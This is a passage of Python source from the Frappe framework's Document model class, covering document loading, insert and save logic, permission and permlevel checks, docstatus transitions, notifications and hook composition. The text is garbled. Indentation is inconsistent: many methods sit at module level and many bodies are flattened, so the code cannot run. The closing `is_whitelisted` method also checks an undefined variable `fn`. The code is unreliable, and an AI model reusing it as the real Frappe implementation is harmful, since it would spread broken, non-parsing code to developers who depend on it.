			kwargs = args[0]

		else:
			raise ValueError('First non keyword argument must be a string or dict')

	if len(args) < 2 and kwargs:
		if 'doctype' in kwargs:
			doctype = kwargs['doctype']
		else:
			raise ValueError('"doctype" is a required key')

	if not doctype:
		# previously fell through to an opaque NameError on `doctype`
		raise ValueError('"doctype" is a required key')

	controller = get_controller(doctype)
	if controller:
		return controller(*args, **kwargs)

	raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
	"""Constructor.

	:param arg1: DocType name as string or document **dict**
	:param arg2: Document name, if `arg1` is DocType name.

	If DocType name and document name are passed, the object will load
	all values (including child documents) from the database.
	"""
	self.doctype = self.name = None
	self._default_new_docs = {}
	self.flags = frappe._dict()

	if args and args[0] and isinstance(args[0], string_types):
		# first argument is doctype
		if len(args)==1:
			# single (name is the doctype itself)
			self.doctype = self.name = args[0]
		else:
			self.doctype = args[0]
			if isinstance(args[1], dict):
				# second argument is a filter dict: resolve it to a name
				self.name = frappe.db.get_value(args[0], args[1], "name")
				if self.name is None:
					frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
						frappe.DoesNotExistError)
			else:
				self.name = args[1]

		if 'for_update' in kwargs:
			self.flags.for_update = kwargs.get('for_update')

		self.load_from_db()
		return

	if args and args[0] and isinstance(args[0], dict):
		# first argument is a dict
		kwargs = args[0]

	if kwargs:
		# init base document
		super(Document, self).__init__(kwargs)
		self.init_valid_columns()

	else:
		# incorrect arguments. let's not proceed.
		raise ValueError('Illegal arguments')
@staticmethod
def whitelist(fn):
	"""Decorator: Whitelist method to be called remotely via REST API.

	Registers `fn` with `frappe.whitelist()` and returns it unchanged."""
	frappe.whitelist()(fn)
	return fn
def reload(self):
	"""Reload document from database"""
	self.load_from_db()
def load_from_db(self):
	"""Load document and children from database and create properties
	from fields"""
	if not getattr(self, "_metaclass", False) and self.meta.issingle:
		# Single doctypes live in tabSingles as key/value rows
		single_doc = frappe.db.get_singles_dict(self.doctype)
		if not single_doc:
			single_doc = frappe.new_doc(self.doctype).as_dict()
			single_doc["name"] = self.doctype
			del single_doc["__islocal"]

		super(Document, self).__init__(single_doc)
		self.init_valid_columns()
		self._fix_numeric_types()

	else:
		d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
		if not d:
			frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)

		super(Document, self).__init__(d)

	# NOTE: this local deliberately shadows the module-level `table_fields`
	if self.name=="DocType" and self.doctype=="DocType":
		from frappe.model.meta import DOCTYPE_TABLE_FIELDS
		table_fields = DOCTYPE_TABLE_FIELDS
	else:
		table_fields = self.meta.get_table_fields()

	for df in table_fields:
		children = frappe.db.get_values(df.options,
			{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
			"*", as_dict=True, order_by="idx asc")
		if children:
			self.set(df.fieldname, children)
		else:
			self.set(df.fieldname, [])

	# sometimes __setup__ can depend on child values, hence calling again at the end
	if hasattr(self, "__setup__"):
		self.__setup__()
def get_latest(self):
	"""Return a freshly fetched copy of this document, cached on `self.latest`."""
	cached = getattr(self, "latest", None)
	if not cached:
		self.latest = frappe.get_doc(self.doctype, self.name)
	return self.latest
def check_permission(self, permtype='read', permlevel=None):
	"""Raise `frappe.PermissionError` if not permitted"""
	if not self.has_permission(permtype):
		self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
	"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
	is not set.

	:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
	if self.flags.ignore_permissions:
		return True
	return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
	"""Raise `frappe.PermissionError`.

	NOTE(review): `perm_type` is not included in the error message here —
	only the doctype is; confirm whether that is intentional."""
	frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
	raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
		ignore_mandatory=None, set_name=None, set_child_names=True):
	"""Insert the document in the database (as a new document).
	This will check for user permissions and execute `before_insert`,
	`validate`, `on_update`, `after_insert` methods if they are written.

	:param ignore_permissions: Do not check permissions if True.
	:param ignore_links: Do not validate Link fields if True.
	:param ignore_if_duplicate: Swallow DuplicateEntryError if True.
	:param ignore_mandatory: Do not check mandatory fields if True.
	:param set_name: [optional] explicit name for the new document.
	:param set_child_names: also name child rows (default True)."""
	if self.flags.in_print:
		return

	self.flags.notifications_executed = []

	if ignore_permissions!=None:
		self.flags.ignore_permissions = ignore_permissions

	if ignore_links!=None:
		self.flags.ignore_links = ignore_links

	if ignore_mandatory!=None:
		self.flags.ignore_mandatory = ignore_mandatory

	self.set("__islocal", True)

	self.check_permission("create")
	self._set_defaults()
	self.set_user_and_timestamp()
	self.set_docstatus()
	self.check_if_latest()
	self.run_method("before_insert")
	self._validate_links()
	self.set_new_name(set_name=set_name, set_child_names=set_child_names)
	self.set_parent_in_children()
	self.validate_higher_perm_levels()

	self.flags.in_insert = True
	self.run_before_save_methods()
	self._validate()
	self.set_docstatus()
	self.flags.in_insert = False

	# run validate, on update etc.

	# parent
	if getattr(self.meta, "issingle", 0):
		self.update_single(self.get_valid_dict())
	else:
		try:
			self.db_insert()
		except frappe.DuplicateEntryError as e:
			if not ignore_if_duplicate:
				raise e

	# children
	for d in self.get_all_children():
		d.db_insert()

	self.run_method("after_insert")
	self.flags.in_insert = True

	if self.get("amended_from"):
		self.copy_attachments_from_amended_from()

	# flag to prevent creation of event update log for create and update both
	# during document creation
	self.flags.update_log_for_doc_creation = True

	self.run_post_save_methods()
	self.flags.in_insert = False

	# delete __islocal
	if hasattr(self, "__islocal"):
		delattr(self, "__islocal")

	# clear unsaved flag
	if hasattr(self, "__unsaved"):
		delattr(self, "__unsaved")

	if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
		follow_document(self.doctype, self.name, frappe.session.user)
	return self
def save(self, *args, **kwargs):
	"""Wrapper for _save"""
	return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
	"""Save the current document in the database in the **DocType**'s table or
	`tabSingles` (for single types).

	This will check for user permissions and execute
	`validate` before updating, `on_update` after updating triggers.

	:param ignore_permissions: Do not check permissions if True.
	:param ignore_version: Do not save version if True."""
	if self.flags.in_print:
		return

	self.flags.notifications_executed = []

	if ignore_permissions!=None:
		self.flags.ignore_permissions = ignore_permissions

	self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version

	# unsaved/unnamed documents are inserts, not updates
	if self.get("__islocal") or not self.get("name"):
		self.insert()
		return

	self.check_permission("write", "save")

	self.set_user_and_timestamp()
	self.set_docstatus()
	self.check_if_latest()
	self.set_parent_in_children()
	self.set_name_in_children()

	self.validate_higher_perm_levels()
	self._validate_links()
	self.run_before_save_methods()

	if self._action != "cancel":
		self._validate()

	if self._action == "update_after_submit":
		self.validate_update_after_submit()

	self.set_docstatus()

	# parent
	if self.meta.issingle:
		self.update_single(self.get_valid_dict())
	else:
		self.db_update()

	self.update_children()
	self.run_post_save_methods()

	# clear unsaved flag
	if hasattr(self, "__unsaved"):
		delattr(self, "__unsaved")

	return self
def copy_attachments_from_amended_from(self):
	"""Copy attachments from `amended_from`

	Re-creates File records pointing the old attachments at this document."""
	from frappe.desk.form.load import get_attachments

	# loop through attachments
	for attach_item in get_attachments(self.doctype, self.amended_from):

		# save attachments to new doc
		_file = frappe.get_doc({
			"doctype": "File",
			"file_url": attach_item.file_url,
			"file_name": attach_item.file_name,
			"attached_to_name": self.name,
			"attached_to_doctype": self.doctype,
			"folder": "Home/Attachments"})
		_file.save()
def update_children(self):
	"""Sync every child table of this document to the database."""
	for table_df in self.meta.get_table_fields():
		self.update_child_table(table_df.fieldname, table_df)
def update_child_table(self, fieldname, df=None):
	"""sync child table for given fieldname

	Updates existing rows, then deletes DB rows no longer present in the
	in-memory document. NOTE(review): the table name is interpolated from
	`df.options` (meta-defined, not user input) — confirm it cannot be
	attacker-controlled before reuse elsewhere."""
	rows = []
	if not df:
		df = self.meta.get_field(fieldname)

	for d in self.get(df.fieldname):
		d.db_update()
		rows.append(d.name)

	if df.options in (self.flags.ignore_children_type or []):
		# do not delete rows for this because of flags
		# hack for docperm :(
		return

	if rows:
		# select rows that do not match the ones in the document
		deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
			and parenttype=%s and parentfield=%s
			and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
			[self.name, self.doctype, fieldname] + rows)
		if len(deleted_rows) > 0:
			# delete rows that do not match the ones in the document
			frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
				','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))

	else:
		# no rows found, delete all rows
		frappe.db.sql("""delete from `tab{0}` where parent=%s
			and parenttype=%s and parentfield=%s""".format(df.options),
			(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
	"""Return the snapshot cached by `load_doc_before_save`, or None."""
	return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
	"""Returns true if value is changed before and after saving.

	Treats a missing before-save snapshot as "changed"."""
	previous = self.get_doc_before_save()
	if not previous:
		return True
	return previous.get(fieldname) != self.get(fieldname)
def set_new_name(self, force=False, set_name=None, set_child_names=True):
	"""Calls `frappe.naming.set_new_name` for parent and child docs.

	:param force: re-run naming even if `flags.name_set` is already set.
	:param set_name: use this name directly instead of the naming rules.
	:param set_child_names: also name child rows (default True)."""
	if self.flags.name_set and not force:
		return

	# If autoname has set as Prompt (name)
	if self.get("__newname"):
		self.name = self.get("__newname")
		self.flags.name_set = True
		return

	if set_name:
		self.name = set_name
	else:
		set_new_name(self)

	if set_child_names:
		# set name for children
		for d in self.get_all_children():
			set_new_name(d)

	self.flags.name_set = True
def get_title(self):
	"""Get the document title based on title_field or `title` or `name`"""
	return self.get(self.meta.get_title_field())
def set_title_field(self):
	"""Set title field based on template

	If the meta's title_field is "title" and the field defines an `options`
	template (or a `default` for new docs), format it with the doc's values."""
	def get_values():
		values = self.as_dict()
		# replace None with "" so str.format doesn't render the word "None"
		for key, value in iteritems(values):
			if value==None:
				values[key] = ""
		return values

	if self.meta.get("title_field")=="title":
		df = self.meta.get_field(self.meta.title_field)

		if df.options:
			self.set(df.fieldname, df.options.format(**get_values()))
		elif self.is_new() and not self.get(df.fieldname) and df.default:
			# set default title for new transactions (if default)
			self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
	"""Updates values for Single type Document in `tabSingles`.

	Deletes all existing key/value rows for the doctype, re-inserts the
	given dict, and invalidates the db value cache."""
	frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
	for field, value in iteritems(d):
		if field != "doctype":
			frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
				values (%s, %s, %s)""", (self.doctype, field, value))

	if self.doctype in frappe.db.value_cache:
		del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
	"""Stamp `modified`/`modified_by` (and `creation`/`owner` if unset) on
	this doc and all children, and register the doc as currently saving."""
	# keep the pre-save timestamp for the optimistic-concurrency check
	self._original_modified = self.modified
	self.modified = now()
	self.modified_by = frappe.session.user
	if not self.creation:
		self.creation = self.modified
	if not self.owner:
		self.owner = self.modified_by

	for d in self.get_all_children():
		d.modified = self.modified
		d.modified_by = self.modified_by
		if not d.owner:
			d.owner = self.owner
		if not d.creation:
			d.creation = self.creation

	frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
	"""Default `docstatus` to 0 (Draft) and propagate it to all child rows."""
	# idiom fix: `is None` instead of `== None` (PEP 8); behavior unchanged
	if self.docstatus is None:
		self.docstatus=0

	for d in self.get_all_children():
		d.docstatus = self.docstatus
def _validate(self):
	"""Run all framework-level field validations on the parent document and
	its children (mandatory check runs on the parent only; it already
	collects child fields itself)."""
	self._validate_mandatory()
	self._validate_data_fields()
	self._validate_selects()
	self._validate_non_negative()
	self._validate_length()
	self._extract_images_from_text_editor()
	self._sanitize_content()
	self._save_passwords()
	self.validate_workflow()

	children = self.get_all_children()
	for d in children:
		d._validate_data_fields()
		d._validate_selects()
		d._validate_non_negative()
		d._validate_length()
		d._extract_images_from_text_editor()
		d._sanitize_content()
		d._save_passwords()

	if self.is_new():
		# don't set fields like _assign, _comments for new doc
		for fieldname in optional_fields:
			self.set(fieldname, None)
	else:
		self.validate_set_only_once()
def _validate_non_negative(self):
	"""Throw `NonNegativeError` if any field marked `non_negative` holds a
	value below zero (Int/Float/Currency fields only)."""
	def get_msg(df):
		# child rows include the row number in the message
		if self.parentfield:
			return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
				_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
		else:
			return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))

	for df in self.meta.get('fields', {'non_negative': ('=', 1),
		'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
		if flt(self.get(df.fieldname)) < 0:
			msg = get_msg(df)
			frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
	def validate_workflow(self):
		"""Validate if the workflow transition is valid"""
		if frappe.flags.in_install == 'frappe': return
		workflow = self.meta.get_workflow()
		if workflow:
			# NOTE: this calls the module-level validate_workflow imported from
			# frappe.model.workflow, not this method (no recursion)
			validate_workflow(self)
			if not self._action == 'save':
				set_workflow_state_on_action(self, workflow, self._action)
	def validate_set_only_once(self):
		"""Validate that fields are not changed if not in insert.

		Compares each `set_only_once` field against the value loaded in
		`_doc_before_save`; throws `frappe.CannotChangeConstantError` on the
		first mismatch."""
		set_only_once_fields = self.meta.get_set_only_once_fields()

		if set_only_once_fields and self._doc_before_save:
			# document exists before saving
			for field in set_only_once_fields:
				fail = False
				value = self.get(field.fieldname)
				original_value = self._doc_before_save.get(field.fieldname)

				if field.fieldtype in table_fields:
					fail = not self.is_child_table_same(field.fieldname)
				elif field.fieldtype in ('Date', 'Datetime', 'Time'):
					# compare as strings so date objects and their string forms match
					fail = str(value) != str(original_value)
				else:
					fail = value != original_value

				if fail:
					frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
						frappe.CannotChangeConstantError)

		return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
	def get_permlevel_access(self, permission_type='write'):
		"""Return the list of permlevels the current user's roles grant for
		`permission_type` on this doctype (cached per permission type on the
		instance in `_has_access_to`)."""
		if not hasattr(self, "_has_access_to"):
			self._has_access_to = {}

		self._has_access_to[permission_type] = []
		roles = frappe.get_roles()
		for perm in self.get_permissions():
			if perm.role in roles and perm.get(permission_type):
				if perm.permlevel not in self._has_access_to[permission_type]:
					self._has_access_to[permission_type].append(perm.permlevel)

		return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
	def check_if_latest(self):
		"""Checks if `modified` timestamp provided by document being updated is same as the
		`modified` timestamp in the database. If there is a different, the document has been
		updated in the database after the current copy was read. Will throw an error if
		timestamps don't match.

		Will also validate document transitions (Save > Submit > Cancel) calling
		`self.check_docstatus_transition`."""
		conflict = False
		self._action = "save"
		if not self.get('__islocal'):
			if self.meta.issingle:
				# singles store `modified` as a row in tabSingles;
				# `for update` locks it until the transaction ends
				modified = frappe.db.sql("""select value from tabSingles
					where doctype=%s and field='modified' for update""", self.doctype)
				modified = modified and modified[0][0]
				if modified and modified != cstr(self._original_modified):
					conflict = True
			else:
				# lock the document row while we compare timestamps
				tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
					where name = %s for update""".format(self.doctype), self.name, as_dict=True)

				if not tmp:
					frappe.throw(_("Record does not exist"))
				else:
					tmp = tmp[0]

				modified = cstr(tmp.modified)

				if modified and modified != cstr(self._original_modified):
					conflict = True

				self.check_docstatus_transition(tmp.docstatus)

			if conflict:
				frappe.msgprint(_("Error: Document has been modified after you have opened it") \
					+ (" (%s, %s). " % (modified, self.modified)) \
					+ _("Please refresh to get the latest document."),
					raise_exception=frappe.TimestampMismatchError)
		else:
			# new document: only validate that docstatus starts from Draft (0)
			self.check_docstatus_transition(0)
	def check_docstatus_transition(self, docstatus):
		"""Ensures valid `docstatus` transition.
		Valid transitions are (number in brackets is `docstatus`):

		- Save (0) > Save (0)
		- Save (0) > Submit (1)
		- Submit (1) > Submit (1)
		- Submit (1) > Cancel (2)

		:param docstatus: docstatus of the copy currently saved in the database.
			Sets `self._action` as a side effect and checks submit/cancel
			permission where required."""
		if not self.docstatus:
			self.docstatus = 0
		if docstatus==0:
			if self.docstatus==0:
				self._action = "save"
			elif self.docstatus==1:
				self._action = "submit"
				self.check_permission("submit")
			else:
				# draft can never jump straight to cancelled
				raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))

		elif docstatus==1:
			if self.docstatus==1:
				self._action = "update_after_submit"
				self.check_permission("submit")
			elif self.docstatus==2:
				self._action = "cancel"
				self.check_permission("cancel")
			else:
				# submitted documents cannot go back to draft
				raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))

		elif docstatus==2:
			raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
	def set_name_in_children(self):
		"""Generate a `name` for any child row that does not have one yet."""
		# Set name for any new children
		for d in self.get_all_children():
			if not d.name:
				set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
	def _validate_mandatory(self):
		"""Collect missing mandatory fields from this document and all child rows
		and raise `frappe.MandatoryError` listing them.

		Skipped entirely when `flags.ignore_mandatory` is set."""
		if self.flags.ignore_mandatory:
			return

		missing = self._get_missing_mandatory_fields()
		for d in self.get_all_children():
			missing.extend(d._get_missing_mandatory_fields())

		if not missing:
			return

		for fieldname, msg in missing:
			msgprint(msg)

		if frappe.flags.print_messages:
			print(self.as_json().encode("utf-8"))

		raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
			fields=", ".join((each[0] for each in missing)),
			doctype=self.doctype,
			name=self.name))
	def _validate_links(self):
		"""Validate that Link values on this document and its children point to
		existing documents, and that none point to cancelled documents.

		Skipped when `flags.ignore_links` is set or when cancelling."""
		if self.flags.ignore_links or self._action == "cancel":
			return

		invalid_links, cancelled_links = self.get_invalid_links()

		for d in self.get_all_children():
			# result is a pair: (invalid links, cancelled links)
			result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
			invalid_links.extend(result[0])
			cancelled_links.extend(result[1])

		if invalid_links:
			msg = ", ".join((each[2] for each in invalid_links))
			frappe.throw(_("Could not find {0}").format(msg),
				frappe.LinkValidationError)

		if cancelled_links:
			msg = ", ".join((each[2] for each in cancelled_links))
			frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
				frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
	def run_method(self, method, *args, **kwargs):
		"""run standard triggers, plus those in hooks"""
		if "flags" in kwargs:
			del kwargs["flags"]

		if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
			# wrap the bound method so it can be composed with hook handlers
			fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
		else:
			# hack! to run hooks even if method does not exist
			fn = lambda self, *args, **kwargs: None

		fn.__name__ = str(method)
		out = Document.hook(fn)(self, *args, **kwargs)

		# fire notifications, webhooks and server scripts bound to this event
		self.run_notifications(method)
		run_webhooks(self, method)
		run_server_script_for_doc_event(self, method)

		return out
	def run_trigger(self, method, *args, **kwargs):
		"""Alias for `run_method`."""
		return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
	# `.__func__` unwraps the staticmethod so `whitelist` can be applied
	# as a decorator inside the class body
	@whitelist.__func__
	def _submit(self):
		"""Submit the document. Sets `docstatus` = 1, then saves."""
		self.docstatus = 1
		self.save()
	@whitelist.__func__
	def _cancel(self):
		"""Cancel the document. Sets `docstatus` = 2, then saves."""
		self.docstatus = 2
		self.save()
	@whitelist.__func__
	def submit(self):
		"""Submit the document. Sets `docstatus` = 1, then saves."""
		# public wrapper; queue_action prefers the `_submit` variant when present
		self._submit()
	@whitelist.__func__
	def cancel(self):
		"""Cancel the document. Sets `docstatus` = 2, then saves."""
		# public wrapper; queue_action prefers the `_cancel` variant when present
		self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method_name):
method = getattr(self, method_name, None)
if not fn:
raise NotFound("Method {0} not found".format(method_name))
is_whitelisted(getattr(method, '__func__', method))
	def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
